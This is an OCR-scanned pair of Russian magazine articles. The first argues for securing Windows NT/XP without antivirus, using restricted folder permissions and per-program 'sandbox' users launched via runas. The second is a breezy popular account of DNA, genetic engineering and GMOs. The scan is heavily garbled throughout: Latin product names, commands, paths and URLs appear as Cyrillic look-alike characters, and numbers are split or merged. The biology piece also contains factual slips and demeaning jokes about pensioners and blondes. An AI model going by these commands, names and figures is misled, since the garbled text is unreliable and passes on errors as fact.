А если там встретится ѴѴгііеРгосеззМетогу, 
ѴііІиаІАІІосЕх, СгеаіеРетоіеТІігеасІ или что-то 
еще в этом роде, то он сделает вывод, что име- 
ет дело с программой, способной внедряться 



в другие процессы. Верный признак червей 
и отладчиков. Ситуация сильно осложняется 
тем, что многие вирусные приемы сейчас ак- 
тивно используются протекторами, и, если 
эвристик не утихомирить, они отправят в топку 
добрую половину легальных программ, чего 
нельзя ни в коем случае допустить! Да и вооб- 
ще, если создатель вируса неглупый человек, 
то он многократно прогонит его через различ- 
ные эвристики, добиваясь их полной и безого- 
ворочной капитуляции. 

Что же касается червей (и, в частности, на- 
шумевшего М3 ВІ_АЗТ, известного также под 
кличкой І_оѵе Зап), то это вообще песня. Уда- 
ляют его антивирусы, не удаляют — что толку? 
Пока есть дыра, он словно феникс из пепла бу- 
дет появляться вновь и вновь. К тому же всег- 
да существует вероятность, что кто-то умный 
напишет свой собственный збеІІ-код, не име- 
ющий с М3 ВІ_АЗТ'ом ничего общего, а потому 
и не детектируемый никаким антивирусом! Не- 
которые дыры можно закрыть брандмауэром, 
но в общем случае для этого необходимо уста- 
новить заплатку от производителя уязвимого 
продукта, которым может быть как сама ось, 
так и один из ее компонентов: ІЕ, РігеРох и т.д. 
Еще существует такой тип антивирусов, как 
ревизоры, в задачу которых входит проверка 
целостности существующих файлов и конт- 
роль за вновь созданными. Некоторые реви- 
зоры также контролируют и реестр, особенно 



ветки, прямо или косвенно ответственные за 
автоматический запуск программ. Во време- 
на МЗ-ООЗ это была очень хорошая штука, но 
сейчас винчестеры так разжирели, что проце- 
дура сканирования отнимает кучу времени, к 
тому же многие сканеры содержат ошибки, 
позволяющие заразить файл без измене- 
ния его контрольной суммы (см. статью «Как 
подделывают СРС16/32», опубликованную в 
«Хакере»), не говоря уже о том, что при пра- 
вильной политике разграничения доступа 
сводит актуальность сканеров на нет, тем бо- 
лее, начиная с ѴѴ2К, система сама контроли- 
рует целостность жизненно-важных файлов 
через механизм ЗРС (Зузіет Еііе СНескег). 
Смысл такой. Запустив команду зіс /зсаппоуѵ 
системная утилита начнет последовательно 
проверять целостность системных файлов. 
В случае каких-либо проблем, подозритель- 
ные файлы будут заменены их достоверными 
копиями из кэша (%ЗузіетРоо{%\\Л/ІІ\ЮОѴѴЗ\ 
Зузіет32ЮІІсасІіе\). Ну вот, сейчас кто-то 
скажет, что ЗРС легко обмануть... Так ведь и 
сканер обмануть ничуть не сложнее, особен- 
но если вирус стелсируется на уровне ядра 
или вообще не внедряется ни в какие объ- 
екты файловой системы, существуя лишь в 
виртуальной памяти какого-нибудь процесса. 
Контроль над целостностью виртуальной па- 
мяти процессов берут на себя как антивирусы, 
так и персональные брандмауэры, распозна- 
ющие и отсекающие все известные способы 
внедрения в чужое адресное пространство, 
да вот только работает этот механизм кое- 
как. Зловредному коду, запущенному с пони- 
женными привилегиями, доступ к чужим про- 
цессам можно запретить средствами самой 
операционной системы, а код, запущенный с 
правами администратора, пройдет сквозь все 
уровни защиты, как нож сквозь масло (при ус- 
ловии, что его писал не пионер, а хотя бы ком- 
сомолец). Самое неприятное, что существует 
множество легальных программ, например, 
мультимедийных клавиатур и мышей, исполь- 
зующих внедрение в чужое адресное про- 
странство для реализации своих мультиме- 
дийных возможностей, поэтому слепой запрет 
брандмауэра/антивируса приведет к их нера- 
ботоспособности ! Значит, необходимо предо- 
ставить пользователю возможность выбора. А 
сможет ли он отличить честную программу от 
нечестной? Но даже не это самое страшное. 
Чем глубже внедряется брандмауэр/антиви- 
рус в систему, тем сложнее зловредному коду 
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> Файловый монитор показывает, на чем 
обламывается запуск Г орящего Лиса 



> В свойствах ярлыка акти 
вируем запуск от другого 
пользователя 



его обойти, но и тем больше конфликтов и глю- 
ков он (брандмауэр/антивирус) вызывает. 
Получается так, что грамотно настроенной 
системе никакой антивирус не нужен, а с без- 
грамотной никакой антивирус все равно не 
справится (брандмауэр стоит ставить только 
затем, чтобы отделить домашнюю локальную 
сеть от интернета и следить за сетевой актив- 
ностью установленных программ, выявляя не 
только шпионов, но и легальные программы, 
пытающиеся проверить корректность регис- 
трации). 

Никакие, даже самые совершенные антивиру- 
сы ни от чего не спасают! При этом они стоят 
немалых денег, пожирают сетевой трафик 
частыми обновлениями, вызывают конфлик- 
ты и тормозят работу системы, между тем сис- 
тема вполне может справиться с вирусами и 
сама — никакие дополнительные костыли ей 
не нужны! 

О Разграничение доступа 
— попробуй пробей 

Я сейчас скажу кое-что, но только если вы 
пообещаете, что не будете кидать в меня 
камни. ѴѴіпсІоѵѵз І\ІТ, в отличие, например, от 
ВЗО, не является многопользовательской 
операционной системой, поскольку только 
один пользователь может работать с ком- 
пьютером в любой момент времени, и прежде 
чем переключиться на другого, необходимо 
завершить текущий сеанс, закрыв все прило- 
жения, и лишь потом. . . А вот в ВЗО все очень 
просто: нажал АІі-Р#, переключился насосед- 
нюю консоль — и все! В ѴѴіпсІоѵѵз ХР наконец- 
то появилась возможность переключения 
сеансов разных пользователей без завер- 
шения, но механизма взаимодействия между 
пользователями как не было, так и нет. 
Правда, в текущем сеансе можно запускать 
программы от имени другого пользователя, но 
это, во-первых, совсем не то, а во-вторых, да- 
леко не все программы соглашаются на такой 
запуск, и еще меньше из них сохраняют свою 
работоспособность в полном объеме. Так что 



без бубна здесь не обойтись. Если нет бубна, 
то сойдет и обычный оцинкованный таз. 

Идея противостояния вирусам заключается в 
выборе правильной политики разграничения 
доступа, тогда вирус (или другая зловредная 
программа) просто не сможет напакостить и 
нанести значительный урон. А для этого все 
потенциально опасные программы нужно за- 
пускать в своеобразной песочнице. В идеале 
— на виртуальной машине типа ѴМѵѵаге, но 
про ѴМѵѵаге мы уже неоднократно писали, а 
вот про разграничение доступа материалов 
практически нет. 

Начнем с того, что никогда, ни при каких обсто- 
ятельствах не следует постоянно сидеть под 
«администратором», поскольку любая запу- 
щенная программа может делать с системой 
все, что ей вздумается. Под администратором 
следует заходить в систему только для выпол- 
нения «ремонтных» работ: установки новых 
драйверов, изменения параметров конфигу- 
рации и т.д. А все остальное время проводить 
под «опытным пользователем» или просто 
«пользователем» с ограниченным доступом. 
Чем меньше у вас привилегий, тем меньше их и 
у каждой запущенной вами программы, одна- 
ко под обыкновенным пользователем многие 
программы работать отказываются, посколь- 
ку требуютзаписи в каталог Ргодгат Рііез или в 
другие «злачные» места. Приходиться громко 
бить в бубен и заниматься тонкой настройкой, 
но зато потом. Зато потом наступает тишь да 
гладь — ни вирусов, ни другого малваре. 
Необходимость в периодическом резерви- 
ровании, естественно, до сих пор сущест- 
вует. Надежнее всего резервироваться на 
СО-Р/РѴѴ, ОѴО-РѴѴ, 2ІР, стримеры и прочие 
внешние носители информации, однако это 
непроизводительно, неудобно, да и надеж- 
ность у винчестеров все же повыше будет, 
чемутогожеСО-РѴѴ. Поступим так. Создадим 
нового пользователя с администраторскими 
правами(Пуск-> ПанельУправления-> Поль- 
зователи и пароли -> Имя -> Пароль -> Другой 
-> Администраторы), назовем его, к примеру, 



«Ьаскир», зайдем под его именем в систему, 
создадим каталог депегаі-зіогез (то есть об- 
щее хранилище) и скопируем туда все, что 
нам необходимо. Затем, щелкнув по каталогу 
правой кнопкой мыши, в появившемся кон- 
текстом меню выбираем вкладку «свойства», 
а там — «безопасность» со списком допу- 
щенных лиц. По умолчанию каталог доступен 
для всех, что никак не входит в наши планы, 
поэтому удаляем «всех» напрочь, предва- 
рительно сбросив галочку «переносить на- 
следуемые от родительского объекта раз- 
решения на этот объект». Все!!! Теперь этот 
каталог недоступен никому, даже системе! 
И только владелец, создавший его (то есть 
«Ьаскир»), может войти в раздел «безопас- 
ность» и вернуть «всех» на место. Внимание! 
Администратор не сможет этого сделать! Ну 
вообще-то, чтобы так не извращаться, после 
удаления «всех» можно добавить пользовате- 
ля «Ьаскир», делегировав ему полный доступ 
к каталогу. Все же остальные пользователи, 
включая членов группы, добраться до этого 
каталога не смогут. Хорошая защита от ви- 
русов и прочих деструктивных программ, не- 
правда ли? Кстати говоря, задумаемся, а что 
произойдет, если случайно (преднамеренно) 
удалить пользователя «Ьаскир»? Ведь тогда 
доступ к архиву не сможет получить никто! К 
счастью, штатная утилита сЬксІзк распознает 
такую ситуацию, и, если видит подобный ка- 
талог-зомби, она автоматически возвращает 
«всех», воскрешая информацию из небытия. 

О Песочница 

— не только детская радость 

Нашей следующей задачей будет постройка 
«песочницы» для всех тех программ, что могут 
быть атакованы из сети, к числу которых при- 
надлежит ІЕ, Ріге Рох, Оиііоок Ехргезз, ТЬе Ваі, 
ІСО и другие. Каждая из них должна быть запу- 
щена из-под ограниченного пользователя, не 
имеющего доступа ни к каким каталогам, кро- 
ме тех, которые явно нужны самой программе. 
В принципе, можно завести одного ограни- 
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АНТИВИРУС НА ПОМОЙКУ 




> Теперь доступ к папке имеет только 
пользователь Васкир. Два клика мышью 
— и никаких вирусов 




> Доступ к папке имеет специально со- 
зданных пользователь — Васкир. 



ченного пользователя на всех, обозвав его, к примеру, 
«запсІЬох» (то есть песочница), однако в этом случае 
червь, пробравшийся через ІЕ, сможет разрушить поч- 
товую базу, накопленную за многие годы, что будет 
обидно. Поэтому лучше всего дать каждой программе 
по пользователю (конечно, это увеличивает потребнос- 
ти системы в памяти, но не столь радикально). 

Итак, создан ограниченный пользователь «запсІЬох», в 
свойствах «безопасности» каждого каталога (или всех 
дисков целиком) «запсІЬох» добавлен, и доступ ему за- 
прещен (политика запрета имеет приоритет над полити- 
кой разрешений, поэтому удалять «всех» совершенно 
не обязательно). По завершению этой нехитрой опера- 
ции у запЬЬох'а останутся только те каталоги, которые 
ему нужны (как правило, это каталоги самой программы, 
причем без права записи в исполняемые файлы). 
Попробуем запустить в песочнице, например, РігеЯэх. 
Создаем ярлык с ЯгеЯэх.ехе (если только это не сделал 
инсталлятор), щелкаем по нему правой клавишей, идем 
в «свойства», затем — в «дополнительно» и там взводим 
галочку «запускать от имени другого пользователя». 
Говорим «ОК» и запускаем. Появляется грозное диа- 
логовое окно, требующее ввода имени и пароля. Вво- 
дим. И... Горящий Лис не запускается! Между прочим, 
в Ыпих/ВЗО подобная операция протекает без каких бы 
то ни было проблем (в ХР и выше проблем конкретно с 
РігеЯэх также не возникает. — Прим, редактора). А здесь 
нужен бубен или более конкретно — файловый монитор 
Марка Руссиновича, показывающий, на каких именно 
файловых операциях программа обламывается (вот 
так, значит, разработчики относятся к сообщениям об 
ошибках). Качаем файловый монитор: ѵѵѵѵѵѵ.зѵзіпіегпаіз. 
сот/ЦЯІіііез/РіІетоп.ІтітІ (он. кстати, занимает меньше 
двухсот килобайт и распространяется совершенно бес- 
платно). Запускаем из-под администратора, создаем 
ярлык и взводим уже известную нам галочку «запускать 
от...»! В данном случае файловый монитор запускает- 
ся, потому чтозапрограммирован правильно, и мы быст- 
рым спортивным шагом идем в Орііопз -> РіІіег/НідМідЬі 
или нажимаем <СТРІ_-І_>. В появившемся 
диалоговом окне взводим все галочки, кроме 
«І_од Зиссеззез», поскольку мониторить успешные 
операции нам незачем! Нам нужны ошибки! Нажимаем 
«ОК» и перезапускаем программу (фильтр будет дейс- 
твовать только после запуска). Вновь запускаем Горя- 



щего Лиса. Что мы видим? Сначала идут ошибки поис- 
ка динамических библиотек в тех каталогах, где их нет 
— это нормально. А вот дальше Г орящий Лис пытается 
создать папку МогіІІа прямо в каталоге ѴѴІІЧІЧТ (в ней он 
хранит свои настройки, кэш страниц и т.д.), куда его, 
естественно, не пускают, и он тихо умирает. 

Да... задача. Пробуем утилиту командной строки гипаз, 
запустив ее так: «гипаз /изепзапсІЬох Ягеіох.ехе» (при 
этом Ягеіох.ехе должен быть в текущей директории). 
Нас деловито спрашивают пароль и... ничего! Теперь 
Г орящийЛислезетвОоситепІзапсІ$еиіпд\ОеТаиІІ ІІзег, 
куда ему также нет доступа! В чем же дело?! В чем при- 
чина?! А в том, что для корректной работы большинства 
программ необходимо загрузить еще и профиль поль- 
зователя, от имени которого мы их запускаем, поэтому 
правильный вариант выглядит так: «гипаз /ргоЯІе /изег: 
запсІЬох Ягеіюх.ехе». Теперь запуск проходит без про- 
блем! 

А вот Опера хранит кэш не в профиле пользователя, 
а непосредственно в своем каталоге (впрочем, это за- 
висит от ее настроек), поэтому запсІЬох'у необходимо 
присвоить права на запись в «ргодгапт Я1ез\орега». 
Остальные программы «распутываются» аналогичным 
образом. Если не помогает файловый монитор, то ка- 
чаем монитор реестра ( ѵѵѵѵѵѵ.зѵзіпіегпаІз.сот/ЦЯІіЯез/ 
Веатоп.ЫтП и смотрим, в каких ветвях нуждается про- 
грамма. Маленький подводный камень: перенаправить 
ввод с клавиатуры на файл, увы, не удастся, и пароль 
придется каждый раз вводить вручную, что напрягает. 
Впрочем, программисты запросто напишут программу, 
лишенную этих недостатков. Нам же главное — создать 
кучу пользователей, распределив права доступа так, 
чтобы зловредные программы не имели никаких шансов 
ни для размножения, ни для шпионской деятельности. 

О Заключение 

Создание защищенной системы без использования ан- 
тивирусов — это реально! Пускай на первоначальном 
этапе нам придется проделать большой объем работы 
и очень много думать головой, создавая столько поль- 
зователей, чтобы полностью изолировать одно потен- 
циально опасное приложение от всех остальных. Зато 
будешь знать наверняка, что, работая на твоей люби- 
мой машине, домашние ничего плохого с ней сделать 
не смогут. =Н= 




> На диске ты найдешь 
полную версию статьи 
Криса, а также програм- 
мы, упомянутые в статье. 




> Если в свойствах папки 
или файла ты вдруг не 
обнаружишь вкладки 
«Безопасность», то 
можешь во всем винить 
парней из МісгозоЯ. Ре- 
бята решили упростить 
все до безобразия и по 
умолчанию спрятали эти 
настройки от ушастого 
пользователя. Вернуть 
все на свои места можно 
через «Проводник 
-> меню Сервис -> 
Свойства папки -> Вид», 
где нужно снять галку с 
опции «Использовать 
простой общий доступ к 
файлам». 
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имплант 



/ МЕТАМОВРН@ѴАЫРЕХ.ВЦ / 



Инженеры 
твоих генов 



ЧТО МОЖЕТ СЕГОДНЯ БИОТЕХ И ГЕННАЯ ИНЖЕНЕРИЯ 



Г 




«...И СКАЗАЛ ИМ БОГ: <...> ВЛАДЫЧЕСТВУЙТЕ НАД РЫБАМИ МОРСКИМИ [И НАД ЗВЕРЯМИ], И НАД ПТИЦАМИ 
НЕБЕСНЫМИ, [И НАД ВСЯКИМ СКОТОМ И НАД ВСЕЮ ЗЕМЛЕЮ], И НАД ВСЯКИМ ЖИВОТНЫМ, ПРЕСМЫКАЮЩИЕСЯ 
НА ЗЕМЛЕ». БЫТИЕ, 1.28.И 



О ы, наверное, знаешь, что такое 
машина. Это относится не только 
к четырехколесному другу, но и к 
любым механизмам, то есть ко всем устройс- 
твам, работающим по принципам механики. 
Ты наверняка их видел, ими пользовался или 
даже их рассчитывал и собирал. То, о чем пой- 
дет речь в этой статье, на 90% тоже связано 
с машинами. Только эти машины могут есть, 
испражняться и даже делать свои копии не- 
сколькими разными способами размножения. 
Как ты уже понял, речь пойдет о всяких живых 
организмах и, в первую очередь, — о тебе. 
Естественно, мама тебя в детстве и не думала 
называть машиной. Да и ты сам не думал, что 
такое когда-либо возможно. Самое интерес- 
ное состоит втом, что человечество узнало эту 
страшную тайну только в середине прошлого 
века. До этого все живое было тайной, пос- 
тичь которую невозможно. В детстве ты уже 
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начал догадываться о настоящей сути живой 
природы: жираф представлялся тебе таким 
«живым» подъемным краном, муравьи, несу- 
щие грузы, — конвейером, а навозный жук, 
катящий шар, — грузовиком. 

С другой стороны, люди строили механизмы с 
оглядкой на природу, поэтому такие совпаде- 
ния тебя не должны удивлять. Но если взять са- 
мое совершенное оборудование, несколько 
разных типов микроскопов и посмотреть глуб- 
же на то, как именно работает живая клетка, 
то все сомнения сразу отпадут. Ты поймешь, 
что под микроскопом разницы между живым и 
неживым нет — везде одни и те же машины. 
Ученые уже около двадцати лет спорят о том, 
можно ли считать вирус живым или нет. То 
есть существо это или что-то вроде боль- 
шой химической молекулы с необычайно 
разнообразными свойствами, которые про- 
являются именно механически. Вот такая 



дилемма. Случилось это потому, что стало 
известно детально, из чего состоит вирус и 
как он «работает». Глядишь, скоро и до нас 
дойдут — будут писать умные книжки о том, 
что представитель вида Ногтю Заріепз, некто 
Вася Пупкин, — никакой не живой организм, 
а, к примеру, сложный коллоидный жидкий 
кристалл с обратной связью в виде походов 
в кусты после выпития І\І-го количества буты- 
локс пивом. Даже отобразят эту зависимость 
в фазовом пространстве. И все тут. Нам-то 
оно безразлично, но тогда возникнет фило- 
софская проблема: ничего в мире необычно- 
го и удивительного нет, везде одни и те же 
шестеренки, электроны и силовые поля. 





О Коротко о главном 

А начиналось все безобидно: врач Генри 
Морган в начале прошлого века путем не- 
хитрых экспериментов доказал, что внутри 
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Мир биологии порой кажется 
хаотичным, но он работает по 
своим логичным законам! 



клеточного ядра есть специальные нуклеино- 
вые (от слова писіеиз — ядро) кислоты. Естест- 
венно, что чем больше мы узнаем о человечес- 
ком теле и о жизни вообще, тем больше можно 
полезного и вредного сделать для самого че- 
ловека. Поэтому все продвинутые биологи на- 
чали изучать эти самые нуклеиновые кислоты. 
Через время оказалось, что они представляют 
собой сложные молекулы кислоты ДНК (де- 
зоксирибонуклеиновой кислоты), а еще через 
время — что в этой кислоте находятся четыре 
молекулы-основания (цитозин, гуанин, аденин 
и тимин, а также урацил, который заменяет ти- 
мин при переписывании его на информацион- 
ную РНК), которые и определяютвсеготебя или 
другое живое существо. 

В 1953 году Фрэнсис Крик и Джеймс Д. Уотсон 
расшифровали трехмерную структуру ДНК. 
ДНК оказалась похожей на веревочную лест- 
ницу, свернутую в двойную спираль. Двойная 
спираль ДНК состоит из двух цепей нуклеоти- 
дов, каждый из которых, в свою очередь, обра- 
зован углеводом дезоксирибозой, азотистым 
основанием и фосфатом. Нуклеотиды-основа- 
ния связаны друг с другом через фосфатные 
группировки, а внутри двойной спирали они 
соединены через пары азотистых оснований 
(«ступеньки лестницы»). 

Примерно в 30-40-х годах прошлого века было 
открыто молекулярное описание биохимичес- 
кого цикла фотосинтеза и дыхания, без кото- 
рого немыслим любой живой организм. Ока- 
залось, что все мы живем на батарейках под 
названием АТФ — аденозинтрифосфорная 
кислота. В процессе нашего бегания-прыга- 
ния-размножения батарейки «садятся» — от 
них отщепляется один фосфорный остаток с 
выделением нужной нам энергии, и нам затем 
надо их «перезаряжать» глюкозой, которую все 
мы получаем из пищи. Вот почему большинству 
лежачих больных прописывают капельницы из 
глюкозы. 

Как ты знаешь, знание — сила, поэтому накоп- 
ленные в конце XX века знания о генных меха- 
низмах работы живых организмов выделились 
в отдельную науку — генную инженерию, поз- 
воляющую делать с генами практически все 
что угодно. Сегодняшнее создание генетичес- 
ки модифицированных организмов и растений 
— только слабое начало биологической рево- 
люции XXI века. 

Но для того, чтобы ты понял, как именно рабо- 
тает наш суперкомпьютер, нужно объяснить 
основы, без которых невозможно двигаться 
дальше. Это нудно, но нужно. Помнишь, как ты 
впервые знакомился с процедурами, рекур- 
сиями и прерываниями? После этого многое 



в программировании стало 
понятней. В биотехе такая же 
ситуация. Есть вещи, узнав 
которые, становится понят- 
ным, что такое ГМО или ген- 
ная вакцина. 

Живой программер 

Ты, наверное, не застал 
перфокарт — это такие кар- 
тонные пластинки, в кото- 
рых пробивают аккуратные 
отверстия, кодирующие те 
или иные процедуры. Так программеры 60-х 
писали для больших машин. Оказалось, они не 
так далеко ушли от биологического суперком- 
пьютера — клетки. Все, что есть в тебе, собаке, 
бактерии, записано в ДНК так же, как если бы 
ты писал прогу на С++. Сам текст проги — это 
и есть аналог ДНК. А результат ее выполнения 
— наше тело, составленное из белков, — ре- 
зультатов транслирования и компилирова- 
ния исходного кода ДНК-проги. В отличие от 
мнемокодов, операторов, процедур и байтов 
природа придумала нехитрый язык триплетов. 
Три любые последовательно расположенные 
основания ДНК (А, Г, Ц, Т(У)) образуют кодовое 
обозначение, названное триплетом. Анесколь- 
ко триплетов, с помощью которых синтезирует- 
ся одна молекула белка, называется геном. Да, 
это те самые гены, которых иногда не хватает в 
организме у генетически больных людей. Сам 
язык ДНК прост: буквы-основания А, Г, Ц, Т(У) 
и триплеты, которых может быть аж 4*4*4 = 64 
типа. При этом некоторые из них «зарезерви- 
рованы» (кодируют полную остановку цикла 
синтеза белков, старт работы синтеза и т.д.). 
Дальше — еще интереснее. Механическая 
сущность программирования наших тел про- 
слеживается по их структуре: белки, которые 
синтезируютсявпроцессевыполненияГлавной 
биологической программы — ДНК, — состоят 
всего из 20-ти базовых кирпичиков-аминокис- 
лот, которые кодируются различными трипле- 
тами. В качестве «системных» используются 
остальные свободные кодоны. Поскольку 20 
аминокислот могут объединяться в самой раз- 
ной последовательности, то они могут обра- 
зовать громадное количество разнообразных 
белков. Число изомеров (различных вариаций 
с другой пространственной конфигурацией 
молекулы белка), которое можно получить при 
всевозможных перестановках всех 
аминокислот в белке, исчисляется 
огромными величинами. Так, если 
из двух аминокислот возможно об- 
разование только двух изомеров, 



то уже из четырех аминокислот теоретически 
возможнообразование24изомеров.Аесли мо- 
лекула белка состоит всего из 1 0 аминокислот, 
то число теоретически возможных вариантов 
белковых молекул, отличающихся порядком 
чередования аминокислот, равно 1020. Но в 
жизни в белках не 1 0, а иногда гораздо больше 
аминокислот, так что запас для строительства 
живых организмов неисчерпаем. 

Как и любой проге, ДНК нужно исполняющее 
устройство, которое произведет белок по за- 
данному в ней коду. Мы просто напичканы эти- 
ми устройствами: в каждой клетке их находится 
до 1 00 штук. Называются они рибосомами. Это 
маленькие белковые машины, которые штам- 
пуют белок из разных аминокислот, прямо как 
на обычной фабрике собирают машину на кон- 
вейере из разных частей. Но для того, чтобы 
производство началось, необходимо соблюс- 
ти несколько важных условий. Первое — «про- 
изводственные» участки Д Н К ( ведь ДНК содер- 
жит ВСЮ информацию об организме), которые 
нужно воплотить в белок, копируют в однолен- 
точный аналог ДНК — информационную мо- 
лекулу и-РНК. Второе — наличие сигнальных 
ферментов в клетке, которые определяют, 
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какие именно части ДНК нужно копировать. 
Затем «выкопировку» и-РНК, как перфокарту 
через привод, протягивают через рибосому, из 
которой «выплевывается» череда аминокис- 
лот, подводимых транспортными молекулами 
РНК, связывающими аминокислоты в одну 
большую белковую молекулу. Управляют этим 
процессом специальные стоповые и старто- 
вые кодоны — УАГ, УАА и т.п. 

Видишь, как схожа работа основного механиз- 
ма построения организма с программировани- 
ем, компилированием и трансляцией? В реале 
отдельные процессы схемы ДНК-и-РНК-Белок 
так и называются: транскрипция и трансляция. 
Не мне тебе говорить, что любой код можно 
изучить и потом использовать, как захочется 
(то есть взломать). Этим и занимаются генные 
инженеры. Любой ген что-то делает для орга- 
низма. Заставить работать живую фабрику 
на себя — вот что задумали генные инженеры! 
Что будет, если забросить в живой транслятор 
свою программу, сшитую из разных кусков 
ДНК? Чистым любопытством ученые не ограни- 
чились. Сперва генные инженеры решили за- 
ставить микроорганизмы производить инсулин, 
спасение для диабетиков. Человеческий инсу- 
лин раньше можно было получать с помощью 
химического синтеза. Но этот синтез настолько 
сложен и дорог, что его проводили только в экс- 
периментальных целях, а полученные количес- 
тва инсулина были недостаточны даже для од- 
ной инъекции. Это был скорее символический 
синтез, доказательство того, что химики могут 
синтезировать в пробирке настоящий белок. 

Г енетики с ходу решили раз и навсегда инсули- 
новую проблему. Они взяли культуру кишечных 



палочек и «перепрограммировали» ихДНКтак, 
чтобы вся их жизненная деятельность своди- 
лась к производству человеческого инсулина. 
При этом этот инсулин, в отличие от говяжьего 
или свиного (которыми лечили раньше), полно- 
стью идентичен нашему родному и не вызывает 
никаких аллергических реакций. И сегодня ин- 
сулин синтезируется только таким «производс- 
твенным» генно-инженерным методом. 

После этого кишечная палочка Е. Соіі стала 
любимой фабрикой ученых. Да, надо заметить, 
что «перепрограммировать» живой организм 
сложно. В тебя, например, засунуть сразу но- 
вую ДНК будет практически невозможно. А 
по отдельности добавлять или изменять отде- 
льные гены можно. Бактерии Е. Соіі, например, 
«прошивают» специальными кольцеобраз- 
ными молекулами ДНК — плазмидами, кото- 
рые представляют собой непонятно что: то ли 
просто сложные молекулы, то ли живой орга- 
низм. В них добавляют тот код, в который нужно 
вставить бактерии, и они 
успешно дополняют род- 
ной код кишечной палочки 
своим. Сейчас развивают- 
ся новые методы доставки 
проги-ДНК в клетку — на- 
пример, заключение в зо- 
лотые нанокапсулы и бомбардирование ими 
клеток. 

Успешно начав с производства инсулина, ген- 
ные инженеры расправили плечи, и через деся- 
ток лет появились... 

□ ГМО — чего реально надо бояться 

Да, всемирная страшилка ГМО (генетически 



модифицированные организмы). Ты, наверное, 
знаешь о рыбьих генах в помидорах, светящих- 
ся кроликах и прочих уродах — результатах 
переделывания живых машин под свои нужды 
такой же машиной-человеком. Зачем? Для за- 
рабатывания денег, конечно! Как ты думаешь, 
какие семена будут покупать больше: морозо- 
устойчивые или нет, защищенные от болезней 
и давящих сорняки или обычные? Конечно, при 
таком раскладе селекционерам впору брать- 
ся за вилы, объявлять трансгенные растения 
игрушками сатаны и громить генетиков. Их 
стараниями введен закон, обязывающий фир- 
мы-производители продуктов на основе ГМО- 
растений указывать это на этикетках. Действует 
это безотказно на пенсионеров, недоразвитых 
детей и блондинок: раз в ГМО-продуктах есть 
рыбьи гены — надо есть обычные помидоры, 
в которых никаких генов вообще нет. Но мы-то 
с тобой знаем, что помидорам сделали тюнинг 
— перепрошил и температурную зависимость. А 
для того, чтобы не напортачить и не выдумывать 
своих алгоритмов, взяли ген устойчивости к хо- 
лоду у глубоководных рыб. 

Все началось в 1 972 году, когда Пол Берг впер- 
вые объединил в пробирке в единое целое два 
гена, выделенных из разных организмов, и по- 
лучил ДНК-гибрид, который сам по себе в при- 
родных условиях образоваться никак не мог. 
Затем новый код ДНК внесли в бактериальные 
клетки. И был создан первый трансгенный орга- 
низм, несущий гены бактерии и гены обезьяны 
(ракового вируса обезьяны, если точнее). А за- 
тем были сконструированы микробы, несущие 
гены мушки дрозофилы, гены кролика, гены че- 
ловекаи... поездпошел. Но тут машинисты дали 
тормоз и мощный тревожный гудок. 

Несколько ведущих американских ученых, 
первым из которых поставил свою подпись Пол 
Берг, опубликовали вжурналеЗсіепсе письмо, в 
котором призвали остановить работы по генной 
инженерии до тех пор, пока не будут выработа- 
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ны правила техники безопасности обращения 
с трансгенными организмами, которые, как по- 
лагалось, могут, помимо воли исследователей, 
иметь свойства, опасные для человека и среды 
его обитания. 

^ вдруг человеческая ДНК, встроенная в 
микроб, приведет к его «возбуждению»? Ктому, 
что он начнет безудержно размножаться и пож- 
рет все живое и неживое? А что будет, если в 
микробную клетку (в ту самую Е.СоІі) встроены 
гены вируса обезьяны, способные превращать 
нормальные клетки человека в раковые? Не 
вызовет ли такая кишечная палочка массовую 
эпидемию злокачественных заболеваний? Не 
передаст ли она онкогены (гены, вызывающие 
рак) другим микробам? 

Так вот ответ на все эти вопросы: за послед- 
ние 15 лет прошли полевые испытания 25000 
разных трансгенных культур, из которых 40% 
— устойчивы к вирусам, 25 % — устойчивы к 
гербицидам, 25% — устойчивы к инсектици- 
дам; посевы трансгенных гербицид-устойчи- 
вых растений (кукуруза, соя, хлопок) во всем 
мире составляют более 28 миллионов гекта- 
ров. С 1 996 года в США на промышленной ос- 
нове выращиваются трансгенные картофель, 
кукуруза и хлопок, поражающие вредных на- 
секомых^ в 2000 году рынок трансгенного 
зерна составил 3 млрд, долларов, а в 201 0 году 
должен достичь 25 млрд, долларов. 

В общем, за 30 лет интенсивного и все расши- 
ряющегося применения генной инженерии во 
всем мире ни одного случая возникновения 
опасности, связанной странсгенными организ- 
мами, зарегистрировано не было. 

Сам производственный процесс ГМО довольно 
прост: ставится задача, подбираются нужные 
гены, культивируется клеточная среда на осно- 
ве измененных генов, которая при определен- 
ных условиях трансформируется в отдельные 
растения, прорастающие из отдельных клеток. 
И в таком растении должны действовать и пе- 
редаваться по наследству искусственно вве- 
денные в исходную клетку гены. Таким методом 
из одного растения можно получить миллионы 
(!) одинаковых растений, а не десятки, как при 
использовании семян при селекции. Клеточная 
технология не требует больших площадей, не 
зависит от погодных условий и отличается ог- 
ромной производительностью. 

Но пенсионеры все равно боятся: мол, «чужие» 



гены, съеденные в измененном продукте, могут 
сами «встроиться» в ген человека, вызывать 
уродства и болезни, засорять природу и при- 
вести к экологической катастрофе. Наверное, 
селекционеры-пенсионеры едят ГМО сразу 
клетками, поэтому уродства им обеспечены. 
Они забыли о том, что ВСЕ искусственно из- 
мененные гены и также произведенные ими 
белки в нашем желудке расщепляются на ами- 
нокислоты и благополучно перевариваются. И 
изменить что-то в генах человека они не могут. 
Почему народ веками ест икру — сплошной ге- 
нетический материал рыб, — а сейчас еще все 
увлеклись суши и едят сырую рыбу — и ни у кого 
ведь жабры не выросли? 

Мы давно используем генно-инженерные ле- 
карства, витамины и вакцины, пьем вино и пиво, 
которое сбраживают генно-инженерные дрож- 
жи, едим йогурты, которые сквашивают генно- 
инженерные лактобактерии, — и это не вызыва- 
ет протеста. Каждый год мировые посевы ГМО 
увеличиваются на 15%, и это единственный 
способ накормить все человечество и избежать 
громадных потерь от болезней и вредителей. 
кЛольза от генетически модифицированных 
растений в год составляет около 1 0 миллиардов 
долларов, что немало для мирового сельского 
хозяйства. 

На растениях генетики не остановились. Те- 
перь они эксдериментируют с животными. Счи- 
тается, что единственными принципиальными 
ограничениями возможностей генной инже- 
нерии животных являются или ограниченная 
фантазия генного инженера, или ограниченное 
финансирование. Непреодолимых природных 
ограничений(как, например, 
физике невозможность 
достижения сверхсветовых 
скоростей) в генной инже- 
нерии, похоже, нет — позво- 
лено все! Светящиеся рыбы 
и кролики — только первые 
шаги к выведению новых высокопроизводи- 
тельных пород свиней и коров. Ты же любишь 
балык к пиву? И хочешь, наверное, чтобы он не 
ударял по карману? Вот они тоже этого хотят. I 

Как нас всех посчитают 

